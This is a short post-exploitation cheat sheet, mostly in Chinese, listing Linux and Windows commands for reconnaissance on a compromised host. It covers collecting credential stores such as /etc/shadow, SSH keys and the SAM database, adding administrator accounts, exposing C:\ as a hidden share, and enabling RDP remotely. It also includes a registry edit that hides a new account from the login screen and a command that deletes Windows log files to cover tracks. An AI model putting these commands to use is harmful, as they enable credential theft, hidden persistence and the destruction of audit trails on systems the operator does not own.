基本信息收集
Linux
- /etc/resolv.conf
- /etc/passwd
- /etc/shadow
- whoami and who –a
- ifconfig -a, iptables -L -n, ifconfig –a,netstat –r
- uname –a, ps aux
- dpkg -l| head
Windows
- ipconfig /all , ipconfig /displaydns,netstat -bnao , netstat –r
- net view , net view /domain
- net user /domain, net user %username% /domain
- net accounts, net share
- net localgroup administrators username /add
- net group “Domain Controllers” /domain
- net share name$=C:\ /unlimited
- net user username /active:yes /domain
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
- wmic nicconfig getipaddress,macaddress
- wmic computersystem get username
- wmic netlogin get name,lastlogon
- wmic process get caption, executablepath,commandline wmic process where name=“calc.exe” call terminate
- wmic os getname,servicepackmajorversion
- wmic product get name,version
- wmic product where name=“name” call uninstall /nointeractive
- wmic share get /ALL
- wmic /node:”machinename” path Win32_TerminalServiceSetting where AllowTSConnections=”0” call SetAllowTSConnections “1“
- wmic nteventlog get path,filename, writeable
收集敏感数据
Linux
- /etc ;/usr/local/etc
- /etc/password ;/etc/shadow
- .ssh ;.gnupg 公私钥
- The e-mail and data files
- 业务数据库 ;身份认证服务器数据库
/tmp
windows
- SAM 数据库 ; 注册表文件
- %SYSTEMROOT%\repair\SAM
- %SYSTEMROOT%\System32\config\RegBack\SAM
- 业务数据库 ; 身份认证数据库
- 临时文件目录
- UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
禁止在登陆界面显示新建账号
REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v uname /T
REG_DWORD /D 0
del %WINDIR%*.log /a/s/q/f
History
日志
- auth.log / secure
- btmp / wtmp
- lastlog / faillog
其他日志和 HIDS 等